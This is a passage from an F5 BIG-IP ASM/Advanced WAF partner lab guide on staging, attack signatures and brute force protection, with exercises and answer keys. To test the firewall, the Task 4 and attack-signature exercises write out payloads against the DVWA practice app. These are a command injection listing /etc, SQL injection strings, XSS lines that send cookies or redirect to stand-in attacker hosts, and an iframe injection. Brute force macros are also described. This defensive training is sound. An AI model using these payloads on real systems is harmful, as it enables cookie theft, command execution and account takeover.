F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 24
ASM Lesson 5 – Learning, Staging, and Enforcement

ASM Lesson 4 – Learning, Staging, and Enforcement

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 25
ASM Lesson 5 – Learning, Staging, and Enforcement

Exercise – Stage and Enforce Entities

• Estimated completion time: 45 minutes.

Task 1 – Review Current Entity Settings

Use the Allowed File Types and Parameters List pages to review the current settings of these two entity types.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Application Security > File Types > Allowed File Types page.

→NOTE: This exercise requires the dvwa_security_policy you created at the end of the previous exercise. If you
don’t have this security policy, you’ll need to repeat task 3 from the previous exercise.

This security policy has already learned all needed file types. Each file type is an entity. Notice that each file type
has four length limit values. Each of these values is an attribute. In addition, all the file types are in staging.
While in staging, the length limit value for each file type will not be enforced. In addition, the wildcard (*) entry
is still in the list.
− Open the Application Security > Parameters > Parameters List page.
BIG-IP ASM has also added several parameters to the parameters whitelist. Each parameter is also an entity.
All parameters are still in staging. In addition, the wildcard (*) entry is still in the list. Also note that all
parameters have a Parameter Value Type of Ignore value. This means that BIG-IP ASM won’t block values
submitted into the web page form fields for input validation.
− Click the name parameter.
While a parameter has a type of Ignore value there are no other configurable attributes.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > auto build.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility return to the Parameters List page.
All (or most) parameters now have a Parameter Value Type of User-input value. This attribute was modified by
the automatic policy builder.
− Click the name parameter.
* The Data Type has been changed to Alpha-Numeric.
* The Maximum Length value is set to 10 (it also may be 100). This isn’t long enough for this parameter, so we’ll
wait for more traffic samples.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 26
ASM Lesson 5 – Learning, Staging, and Enforcement
− Open the Value Meta Characters tab and scroll down to view the Global Security Policy Settings list.

By default, certain keyboard characters are disallowed in user-input value parameters. However, some of these
disallowed keyboard characters are expected to be input by users into this parameter, so we’ll wait for more
traffic samples.

The security policy has been created with all required file types, URLs, and parameters, but these entities aren’t
yet enforced. BIG-IP ASM needs more requests to complete the security policy, also known as stabilizing the
security policy.

Task 2 – Update the Policy Building Learning Speed

To simulate more traffic over time for building the security policy, adjust the learning speed settings.

− Open the Learning and Blocking Settings page, then at the bottom of the page expand the Loosen Policy,
Tighten Policy (stabilize), and Minimize false positives (Track Site Changes) sections.
− In the Loosen Policy section update the values as follows:

→NOTE: Don’t worry about that the two modified values are displaying red with error messages. The error
messages will disappear shortly. Also, .0001 days is about 9 seconds.

− In the Tighten Policy (stabilize) section update the values as follows:

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 27
ASM Lesson 5 – Learning, Staging, and Enforcement
− In the Minimize false positives (Track Site Changes) section update the values as follows:

By lowering these values, you can create and stabilize a security policy at a much more rapid rate when
using trusted requests.
− Click Save, and then click Apply Policy.

Task 3 – Use Learning Suggestions to Stabilize the Security Policy

Use a Firefox iMacro to simulate several requests over time to stabilize dvwa_security_policy.

− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
This macro simulates several requests submitting data into different parameters.
− In the Configuration Utility open the Allowed File Types page.
Notice the following:
* A new file type has been added to the list (pdf).
* The wildcard (*) entry is no longer on the list. This means that BIG-IP ASM considers this list complete,
however it’s still open to learning new file types to add to the list.
* Several file types are no longer in staging, which means BIG-IP ASM will enforce the length limits.
* The query string length limit for the no_ext file type was changed to 2048. This is due to user requests that
exceeded the default 1000 length limit, and therefore BIG-IP ASM adjusted this attribute.
− Open the Parameters List page.
There are a couple new parameters (ip and submit, which will be on Page 2 of the entries) for the
/vulnerabilities/exec URL that are set to Ignore value. Many of the other parameters are no longer in staging.

While the different file types and parameters are still in staging, the security policy is not yet stabilized.
− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Application Security > Audit > Log page.
This page displays all the changes made to a security policy, either by an administrator or the policy builder.
− From the Element Type list select Parameter, and then from the Event Type list select Add.
You can see all new element types that were added, such as all new parameters.
− From the Event Type list select Update.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 28
ASM Lesson 5 – Learning, Staging, and Enforcement
− Click Show Filter Details.
− In the Element Name field enter mtxMessage, and then click Go.
You can see all the modifications for any specific security policy element type, such as
the mtxMessage parameter.
− Click Reset, and then from the Element Type list select Apply Policy.
You can see every time the security policy was applied, either manually by an administrator
(Component column > GUI) or automatically by the policy builder (Component column > System).

− Open a New private window (Firefox) and in the iMacros pane select Exercises > stabilize policy.iim, and then
click Play (Loop). Once the macro has completed close the Firefox window.
− In the Configuration Utility open the Allowed File Types page.
All file types are no longer in staging, which means they are enforced. The allowed file types list is now stable.
Any user requests that are longer than the configured length values will be considered illegal requests and may
be blocked by BIG-IP ASM.
− Open the Allowed URLs page and examine both pages of URLs.
All URLs except for /vulnerabilities/sqli (on Page 2) are now enforced. The allowed URLs list nearly stabilized.
− Open the Parameters List page.
Nearly all parameters except for the Submit and id parameters for the /vulnerabilities/sqli URL are now
enforced. The parameters list is also nearly stabilized.
− Click the name parameter.
Notice that the name parameter is enforced (no longer in staging) and now has a Maximum Length value of 500,
which is a sufficient length for this parameter.

→NOTE: If the name parameter Maximum Length isn’t set to 500 and also enforced, use a New private window
in Firefox and run the stabilize policy.iim macro again, and then re-check the name parameter.

− Open the Value Meta Characters tab.

Four meta characters have been added as allowed characters for this parameter. This was based on the values
that were submit using the macro.
− Open the Policies List page and click dvwa_security_policy.
− For Policy Building Learning Mode click Disabled, and then click Save.
As the security policy is nearly stable, you’re going to disable any new policy learning.
− Open the Allowed File Types page.
We have decided to not keep the Query String Length value of 2048 for the no_ext file type.
− Click no_ext, then change the Query String Length value to 1500, then click Update, and then click Apply Policy.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 29
ASM Lesson 5 – Learning, Staging, and Enforcement

Task 4 – Examine File Type and Parameter Enforcement

Identify the behavioral difference between non-enforced entities (file types and parameters) and enforced entities.

− Open a new Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.
− Copy and paste the following into the URL field and press Enter. (NOTE: Use the copy and paste guide inside
the Documents directory.)
http://10.1.10.35/vulnerabilities/xss_s/?mtxMessage=GLOBALWIN+Women's+1730+Waterproof+Winter+Boots.+Size:+My+shoe+size+is+8.5,+so
+I+ordered+this+GLOBANWIN+winter+boots+size+8.5.+it+is+perfectly+fit+to+my+feet.+It+does+not+squeeze+at+all.+It+has+a+right+amoun
t+of+room+for+wearing+thin+2+socks+or+one+thick+winter+socks+to+keep+your+feet+warm+in+cold+weather.+Design:+it+is+13+inches+long
,+so+it+comes+to+your+middle+thigh+area.+The+synthetic+fur+makes+the+winter+boots+stylish+and+warm.+Especially+it+warm+along+with
+your+shin+area+and+around+middle+thigh+area+where+fur+is+insulted.+3+inches+nylon+study+material+in+the+bottom+of+the+winter+boo
ts+prevent+your+feet+wet+from+rain+and+snow.+Insolation+inside:+insolated+with+the+right+amount+of+thick+materials,+so+it+is+not+
too+warm+or+cold.+There+are+two+things+I+would+not+like+about+these+boots+are+first+the+fur+is+falling+out+a+little+amount+of+fur
+each+time+I+scab+off+and+brush+off+them+with+my+fingers.+But+I+think+that+is+a+normal+thing+happened+to+any+winter+boots.+The+bo
ot+itself+sits+just+below+the+widest+part+of+the+calf+muscle,+but+there's+some+"give"+there+to+the+width,+so+it+doesn't+just+have
+to+be+over+your+basic+skinny+jeans/leggings,+I+can+slip+them+on+over+thick+sweat+pants+when+I+drop+my+kids+off+at+school,+or+ove
r+thick+work+jeans+when+feeding/watering+animals,+But+I+also+wore+them+to+a+farmers+market+with+a+tied+up,+double+layered+sari+sk
irt+over+leggings+(it's+been+a+cold+season).+Excellent+versatility.+Please+let+me+know+when+there+is+an+upgrade.&txtName=I+can't+
speak+highly+enough+about+this+product!#

Questions:
Was the request allowed or blocked? __________________

Why did you get this result? ____________________________________________________

− Copy the support ID number of the blocked request.

− In the Configuration Utility open the Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the Open Filter icon, then paste the value you copied into the Support ID field, and then click Apply Filter.
− Under Occurrences click 1.

The request was blocked because it violated the query string length value of 1500.
− In the blocked page click the DVWA bookmark, then click XSS reflected, then type ASM is 100% amazing into
the field, and then click Submit.

Questions:
Was the request allowed or blocked? __________________

Why did you get this result? ____________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 30
ASM Lesson 5 – Learning, Staging, and Enforcement
− Copy the support ID value, then in the Configuration Utility click the Open Filter icon, then paste the new
support ID value, and then click Apply Filter.
− Under Occurrences click 1.
The request was blocked because it violated the Illegal meta character in value violation. It included the
percent character (%) in the name parameter, which isn’t on the allowed meta characters list for this parameter.
− In the blocked page click the DVWA bookmark, then click XSS reflected, then copy and paste the following in
the field, and then click Submit.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>

The cross-site scripting attempt is blocked by BIG-IP ASM.

− Click the DVWA bookmark, then click SQL Injection, then copy and paste the following in the User ID field,
and then click Submit.
%' or 1='1

Questions:
Was the SQL injection request allowed or blocked? __________________

Do we want the SQL injection request allowed or blocked? __________________

− Right-click inside the field and select Inspect Element, and then examine the parameter name value.

The name of this parameter is id.

− Close the inspection window, and then examine the current URL.
The URL you’re on is /vulnerabilities/sqli/.
− In the Configuration Utility open the Parameters List page and examine the id parameter for
the /vulnerabilities/sqli/ URL.

Questions:
Why did an attack on the id parameter have a different result than an attack against
the name parameter?

________________________________________________________________________

− Select the checkbox for the id parameter for the /vulnerabilities/sqli/ parameter, and then click Enforce and
then OK, and then click Apply Policy.

The id parameter is no longer in staging and is now enforced.

− In the DVWA page reload the SQL Injection page, and then close the blocked page.
The SQL Injection attempt is now blocked by BIG-IP ASM.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 31
ASM Lesson 5 – Learning, Staging, and Enforcement

PREPARE FOR NEXT EXERCISE

− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit

Question and Answer Key

Task 4 – Examine File Type and Parameter Enforcement
Q: Was the request allowed or blocked?
A: Blocked

Q: Why did you get this result?

A: The query string value was longer than 1500 characters.

Q: Was the request allowed or blocked?

A: Blocked

Q: Why did you get this result?

A: It contained an illegal metacharacter (%).

Q: Was the SQL injection request allowed or blocked?

A: Allowed

Q: Do we want the SQL injection request allowed or blocked?

A: As an SQL injection attack, it should have been blocked.

Q: Why did an attack on the id parameter have a different result than an attack against
the name parameter?
A: The name parameter is enforced (no longer in staging), while the id parameter is still in staging
and not yet being enforced.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 32
ASM Lesson 5 – Attack Signatures

ASM Lesson 5 – Attack Signatures

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 33
ASM Lesson 5 – Attack Signatures

Exercise – Use ASM Attack Signatures

• Estimated completion time: 45 minutes.

Task 1 – Create a New Security Policy

Create a security policy for dvwa_virtual, and then add additional signature sets to the security policy.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and click dvwa_virtual, and then open the Resources page.
− In the iRules section click /Common/several_regions.
This iRule was added to the virtual server using the TMSH command. This iRule will simulate each client request
coming from a unique worldwide IP address.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)
Enforcement Mode Blocking

− Once the policy is created click dvwa_security_policy.

− Under the Advanced settings, for Trust XFF Header select the Enabled button, and then click Save.

This setting will enable BIG-IP ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− Under Security Policy Configuration click Attack Signatures.

Question:
How many signatures are currently attached to the security policy? __________________

− Under Security Policy Configuration click General Settings.

− In the Advanced Settings section, in the Server Technologies field, begin typing Apache Tomcat, then once it
displays select it, and then click Confirm.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 34
ASM Lesson 5 – Attack Signatures
− Repeat this process for the following:
o MySQL
o PHP
o Unix/Linux
− Click Save, and then click Attack Signatures again.

Question:
How many signatures are now attached to the security policy? __________________

− Open the Application Security > Policy Builder > Learning and Blocking Settings page, and then
expand Attack Signatures.
The security policy includes generic detection signatures along with custom signatures that apply to the
web application that you just configured.
− Click Change.
− Select the Low Accuracy Signatures, Command Execution Signatures, Cross Site Scripting Signatures,
Other Application Attacks Signatures, and SQL Injection Signatures checkboxes, and then click Change.
− Click Save, and then return to the Attack Signatures page for dvwa_security_policy.

Question:
How many signatures are now attached to the security policy? __________________

− Click the filter icon.

− For Attack Type select SQL-Injection.
− Select the Advanced tab, then for Accuracy select Medium, and then click Apply Filter.

Question:
How many signatures are displayed in this filter? __________________

− Click Apply Policy.

Task 2 – Use Signature Violations to Enforce Attack Signatures

Submit several attacks against the DVWA web application, then use the violations to enforce specific attack
signatures, and then attempt the attacks again and examine how and why they are blocked.

− Open Firefox window and click the DVWA bookmark, and then log in as hacker / hackyou.
− Click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

You have exposed the contents of the /etc directory on the web server. Using command execution, you can
retrieve confidential files on the web server. The goal of command execution attacks is to be able to run arbitrary
commands on the target host operating system.
− Click SQL Injection, then copy and paste the following in the User ID field, and then click Submit:
$username = 1' or '1' = '1

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 35
ASM Lesson 5 – Attack Signatures
− Click XSS reflected, then copy and paste the following in the field, and then click Submit.
<a href=# onclick=\"document.location=\'http://not-real-
xssattackexamples.com/xss.php?c=\'+escape$document.cookie$\;\">My Name</a>

− Click XSS stored, then create a guestbook entry named Encoding, then copy and paste the following Review,
and then click Submit Review.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6
e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%
61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61
%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

This attempt is trying hide the attack string by encoding the malicious code within the request.
− In the Configuration Utility open the Application Security > Policy Builder > Traffic Learning page.
− On the right-side of the page, examine the Enforcement Readiness Summary section.
− Select the number of signatures that are not enforced but have suggestions.

This navigates us to the Attack Signatures page with only the triggered signatures selected.
These attack signatures need to be enforced to block requests that match the signatures.
− Select the Select all signatures checkbox, and then click Enforce, and then click Enforce again.

− Once the security policy has finished loading click the filter icon, then from the Status list select Enforced,
and then click Apply Filter.

At any time, you can see all attack signatures that have been enforced for a security policy.
− Click Apply Policy.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 36
ASM Lesson 5 – Attack Signatures
− In the DVWA page click Command Execution, then copy and paste the following in the field, and then click Submit.
1 | ls /etc

The command execution attack is now blocked by BIG-IP ASM.

− Click the DVWA bookmark, then click SQL Injection, then copy and paste the following in the User ID field,
and then click Submit.
$username = 1' or '1' = '1

The SQL Injection attack is now blocked by BIG-IP ASM.

− Click the DVWA bookmark, then click XSS reflected, then copy and paste the following in the field, and then
click Submit.
<a href=# onclick=\"document.location=\'http://not-real-
xssattackexamples.com/xss.php?c=\'+escape$document.cookie$\;\">My Name</a>

− Click the DVWA bookmark, then click XSS stored, then create a guestbook entry named Encoding, then copy and
paste the following Review, and then click Submit Review.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6
e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%
61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61
%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e

Both cross-site scripting attacks are now blocked by BIG-IP ASM.

− In the Configuration Utility open the Security > Event Logs > Application > Requests page.
(HINT: You can simply click on “Event Logs”.)
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are four blocked log entries.
− Select the log entry for /vulnerabilities/exec/ and under Occurrences click 2, and then scroll down to view the
matched attack signature.

− Examine the Violation Rating and Attack Types values.

This request was blocked because it matched the enforced command execution attack signature.
− Select the /vulnerabilities/sqli/ log entry and under Occurrences click 3 to view the different matched
attack signatures.
− Select the /vulnerabilities/xss_s/ log entry and scroll down to examine both the Original Request
and Decoded Request sections.
The encoded request was decoded by BIG-IP ASM to identify the matched attack signatures.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 37
ASM Lesson 5 – Attack Signatures
− In the DVWA page click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then copy
and paste the following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-
5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height=" 320"></iframe>

Questions:
Was the request allowed or blocked? __________________

Do we want this request allowed or blocked? __________________

Why didn’t BIG-IP ASM use an attack signature to block this request? ___________________

____________________________________________________________________________

− In the Configuration Utility open the Traffic Learning page, and then in the Enforcement Readiness Summary
section select the number of signatures that are not enforced but have suggestions.
− Select the Select all signatures checkbox, then click Enforce and click Enforce again, and then click Apply Policy.
− In the DVWA page, click the DVWA bookmark, then click XSS stored, then create an entry named Virus, then paste
the following Review, and then click Submit Review.
<iframe src="https://cdn2.hubspot.net/hub/2683519/hubfs/signal_images/articles/article-
5469925982/dangerous%20website.jpg?width=640&name=dangerous%20website.jpg" width="650" height="320"></iframe>

The iFrame-based cross-site scripting attack is now blocked by BIG-IP ASM.

− Click the DVWA bookmark, then click Setup, and then click Create / Reset Database.

Task 3 – Create a Custom Signature

Due to a new attack threat, create a custom signature so BIG-IP ASM can block requests using the new attack string.

− In the DVWA page click XSS reflected, then copy and paste the following in the field, and then click Submit.
<new attack string: chumbawamba>

This new attack string is not blocked, as BIG-IP ASM doesn’t have an attack signature for this new attack.
− In the Configuration Utility open the Traffic Learning page, and then examine
the Enforcement Readiness Summary section.
There are no new triggered signatures, because BIG-IP ASM doesn’t yet have a signature for this new attack.
− Open the Security > Options > Application Security > Attack Signatures > Attack Signature List page and
click Create.
− Configure the custom attack signature using the following information, and then click Create. (NOTE: Use the copy
and paste guide inside the Documents directory.)
Name "%.Chumbawamba" access (parameter)
Attack Type Other Application Attacks
Rule Click Add
Request Content > contains string > chumbawamba

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 38
ASM Lesson 5 – Attack Signatures
− Open the Security > Options > Application Security > Attack Signatures > Attack Signature Sets page and
click Other Application Attacks Signatures.
Notice this is a Filter-based signature set. It’s configured to filter (and use) all signatures with the Attack Type
of Other Application Attacks.
− Examine the Signatures section.
Because we identified the custom signature with Other Application Attacks, it’s automatically included within
this signature set, and remember that we added this signature set in Task 1.
− In the DVWA page click the DVWA bookmark, then click XSS stored, then create an entry named Attack, then copy
and paste the following Review, and then click Submit Review.
<new attack string: chumbawamba>

Question:
Why wasn’t this request blocked? __________________

− In the Configuration Utility open the Traffic Learning page, then in the Enforcement Readiness Summary section
select the number of signatures that are not enforced but have suggestions.
− Select the custom signature checkbox, then click Enforce and click Enforce again, and then click Apply Policy.
− In the DVWA page click the DVWA bookmark, the click XSS reflected, then paste the following in the field and
click Submit.
<new attack string: chumbawamba>

− Click the DVWA bookmark, then click Command Execution, then paste the following in the field and click Submit,
and then close the blocked page.
<new attack string: chumbawamba>

This new attack string is now blocked by BIG-IP ASM on all parameters.
− In the Configuration Utility open the Event Logs > Application > Requests page and select the log entry
for /vulnerabilities/exec/, and then under Occurrences click 1 and view the matched attack signature.

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 39
ASM Lesson 5 – Attack Signatures

Question and Answer Key

Task 1 – Create a Security Policy
Q: How many signatures are currently attached to the security policy?
A: Answers will vary, but it should be around 2,250.

Q: How many signatures are now attached to the security policy?

A: Answers will vary, but it should be near 3,200.

Q: How many signatures are now attached to the security policy?

A: Answers will vary, but it should be near 5,250.

Q: How many signatures are displayed in this filter?

A: Answers will vary, but it should be over 250.

Task 2 – Use Signature Violations to Enforce Attack Signatures

Q: Was the request allowed or blocked?
A: Allowed

Q: Do we want this request allowed or blocked?

A: Blocked

Q: Why didn’t BIG-IP ASM use an attack signature to block this request?
A: The attack signature for this attack hasn’t been enforced yet.

Task 3 – Create a Custom Signature

Q: Why wasn’t this request blocked?
A: It isn’t enforced yet.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 40
ASM Lesson 6 – Brute Force Protection

ASM Lesson 6 – Brute Force Protection

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 41
ASM Lesson 6 – Brute Force Protection

Exercise – Use Brute Force Protection

• Estimated completion time: 45 minutes.

Task 1 – Create a Security Policy

Create a security policy for hackazon_virtual using the automatic policy builder.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and examine hackazon_virtual.
This is the virtual server created by the TMSH command above. We’ll be protecting this virtual server against
brute force attacks in this exercise.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name hackazon_security_policy
Policy Template Rapid Deployment Policy
Virtual Server hackazon_virtual (HTTP)
Enforcement Mode Blocking
Policy Builder Learning Mode Automatic
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Learning and Blocking Settings page.
− Expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, then click Apply Policy.
− Open a new tab and click the Hack Login bookmark, and then close the tab.
− In the Configuration Utility open the Policies List page and click hackazon_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, then click Save, and then click Apply Policy.
You used this process to learn about the /user/login URL, which you’ll need when configuring
a Login Page element for brute force protection.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 42
ASM Lesson 6 – Brute Force Protection

Task 2 – Run a Brute Force Attack

Use iMacros for Firefox to launch a brute force attack against the web site.

− Open a new Firefox window, then click the iMacros button, and then in the iMacros pane right-click
on Exercises > brute single user.iim and select Edit Macro.
− Examine lines 1, 2, and 3.
You’re a malicious user, and you’ve identified that a user’s email address is [email protected]. All you need
to do is figure out their password. This macro attempts to log on to the /user/login page (line 1) using the
username [email protected] (line 2) with a series of different passwords (line 3, line 5, etc.).
− Click Cancel, and then click Play.
Eventually the brute force attacker successfully finds valid credentials.
− On the Hackazon My Account page click Profile.
You now have access to this user’s account details.

Notice that in the iMacros pane an error occurred on line 33.

The macro failed because it could no longer attempt to log in, as it was no longer on the /user/login page.
That means that we found the correct password right before line 33.
− Right-click on brute single user.iim and select Edit Macro, and then examine the entries right before line 33.

Question:
What is the correct password for [email protected]? ____________________________

This is an example of a brute force attack targeting a specific username.

− Click Cancel, and then in the Hackazon page click Logout, then click Sign In / Sign Up and attempt to log in
as test / test.
Notice that the login page URL is /user/login, and that the text “incorrect” displays after a failed login attempt.
You’ll need this information when creating a BIG-IP ASM Login Page.

− Right-click inside the username field and select Inspect Element.

The name value for this field is username. You’ll also need this when creating a BIG-IP ASM Login Page.
− Right-click inside the password field and select Inspect Element, then identify the name value for this field,
and then close the inspection window.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page
(HINT: You can simply click on “Event Logs”.) and scroll through the entries in the log file.
There were several legal requests caused by the brute force attack against the/user/login page.
− Select the /user/login log entry directly before the /account log entry, and then click All Details.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 43
ASM Lesson 6 – Brute Force Protection
− Identify the Username value.
BIG-IP ASM isn’t tracking the username of the logged in user. Also, notice that currently there is
no Login Result field on the All Details page.
− Select the Select all items checkbox, and then select Delete Requests > Delete all requests.

Task 3 – Create and Test a Login Page Element

Update hackazon_security_policy to identify successful and unsuccessful login requests.

− Navigate to Application Security > URLs and right-click on Allowed URLs page and
select Open link in new tab, then in the new tab, in the URL Contains field type /user/login, and then click Go.
This URL was added in task 1 when you built the security policy. You need the login page URL when creating
a Login Page, which BIG-IP ASM needs for brute force protection.
− Use this tab to open the Application Security > Sessions and Logins > Login Pages List page and click Create.
− For Login URL leave Explicit > HTTP selected, then click into the field and begin typing /user/login, and then select
it once it displays.

− Configure the login page using the following information, and then click Create.
Authentication Type HTML Form
Username Parameter Value username
Password Parameter Value password
A string that should NOT appear in the response incorrect
Expected HTTP response status code 302

− Click Apply Policy.

− In the Firefox Hackazon page click the Hack Login bookmark and attempt to log in
as [email protected] / hacked.
− Attempt to log in as [email protected] / P@ssw0rd!, and then click Logout.
− In the Configuration Utility reload the Application > Requests tab.
− Select the /user/login log entry directly before the /account log entry, and then use the All Details tab to identify
the Username value.

BIG-IP ASM now tracks the attempted username of these attacks.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 44
ASM Lesson 6 – Brute Force Protection
− Identify the Login Result value.

BIG-IP ASM now identifies the login result because of the values you entered on the login page element.
− Select the previous /user/login log entry and identify the Login Result value.
Using the login page element, BIG-IP ASM can now identified successful and failed login attempts.
By identifying Failed login attempts, BIG-IP ASM will be able to identify brute force attempts.

Task 4 – Add Brute Force Protection for Specific Usernames

Update hackazon_security_policy to identify and then block brute force attacks targeting a single username.

− Using the Login Pages List tab open the Application Security > Brute Force Attack Prevention page and
click Create.
− From the Login Page list select [HTTP]/user/login.
− In the Source-based Brute Force Protection section configure the following, and then click Create.
Username Trigger: After 3 failed login attempts
Action: Alarm and CAPTCHA
Device ID, Never
IP Address
Client Side Integrity Bypass Mitigation
CAPTCHA Bypass Mitigation

− Click Apply Policy.

− In Firefox with brute single user.iim selected click Play.
After a few successful attack attempts, you’re presented with a CAPTCHA challenge.
− Enter the CAPTCHA challenge (which is case sensitive), and then click Play again.
You’re immediately presented with the CAPTCHA challenge.
− Open Internet Explorer and click the Hack Login bookmark, then attempt to log in
as [email protected] / brute, and then close the Internet Explorer window.
Even with a new browser session, the brute force attempt is immediately presented with a CAPTCHA challenge.
− In the Configuration Utility reload the Application > Requests tab.
− Select the Open Filter icon, then select the IP / Username / URL tab, then in the URL contains field
enter /user/login, and then click Apply Filter.
− Select an Illegal request log entry.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 45
ASM Lesson 6 – Brute Force Protection
− Under Occurrences select 1, and then view the Enforcement Action Reason value.

This event log entry was generated when you entered a correct CAPTCHA challenge response. Notice that
the Username is included in the details window, and the threshold matches our setting of 3.

→NOTE: If you don’t have an event log entry with this value, you either didn’t successfully enter the CAPTCHA
challenge, or you didn’t enter the CAPTCHA challenge quick enough.

− Select a Challenged request log entry, and then under Occurrences select 1.

This event log entry was generated when you didn’t attempt to enter a CAPTCHA challenge.
− In Firefox right-click on Exercises > brute multiple users.iim and select Edit Macro.
Now that you know that the user whose email is [email protected] has a password of P@ssw0rd!,
you will try to determine their personal username. This macro attempts to log on using different variations
of this user’s first, middle, and last name with the password of P@ssw0rd!.
− Click Cancel, and then click Play.
Once again, you’ve successfully gained access to the victim’s account, and you could use the line that the macro
failed on to identify the last username that was attempted to determine the correct username.

Question:
Why didn’t this brute force attack get blocked by the CAPTCHA challenge?

__________________________________________________________________

− Click Logout.

Task 5 – Add Brute Force Protection for Specific IP Addresses

Update hackazon_security_policy to identify and then block brute force attacks from a single source IP address.

− In the Configuration Utility, on the Brute Force Attack Protection tab click [HTTP]/user/login.
− For IP Address select the After option, and then enter 7 failed login attempts.
− From the Action list select Alarm and Blocking Page.
− Click Save, and then click Apply Policy.
